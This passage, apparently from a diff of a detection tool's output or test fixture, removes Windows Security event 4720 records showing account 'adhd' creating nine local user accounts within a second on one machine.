-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.1850043Z'/&gt;&lt;EventRecordID&gt;4609&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Carl&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1094&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Carl&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Carl</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4603</recordid>
-            <time>2020-06-11 22:04:59.957718700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.9577187Z'/&gt;&lt;EventRecordID&gt;4603&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Olivia&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1093&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Olivia&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Olivia</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4597</recordid>
-            <time>2020-06-11 22:04:59.880188300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.8801883Z'/&gt;&lt;EventRecordID&gt;4597&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Michelle&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1092&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Michelle&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Michelle</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4591</recordid>
-            <time>2020-06-11 22:04:59.654860600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.6548606Z'/&gt;&lt;EventRecordID&gt;4591&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Danielle&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1091&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Danielle&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Danielle</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4585</recordid>
-            <time>2020-06-11 22:04:59.562873500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.5628735Z'/&gt;&lt;EventRecordID&gt;4585&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Frank&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1090&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Frank&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Frank</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4579</recordid>
-            <time>2020-06-11 22:04:59.420807300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.4208073Z'/&gt;&lt;EventRecordID&gt;4579&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Mark&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1089&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Mark&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Mark</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4573</recordid>
-            <time>2020-06-11 22:04:59.342815700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.3428157Z'/&gt;&lt;EventRecordID&gt;4573&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Gloria&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1088&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Gloria&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Gloria</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4567</recordid>
-            <time>2020-06-11 22:04:59.257908400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.2579084Z'/&gt;&lt;EventRecordID&gt;4567&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Joe&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1087&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Joe&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Joe</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4561</recordid>
-            <time>2020-06-11 22:04:59.178807000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:59.1788070Z'/&gt;&lt;EventRecordID&gt;4561&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Patrick&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1086&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Patrick&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Patrick</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4555</recordid>
-            <time>2020-06-11 22:04:59.35410700Z</time>
-            <channel>Security</channel>
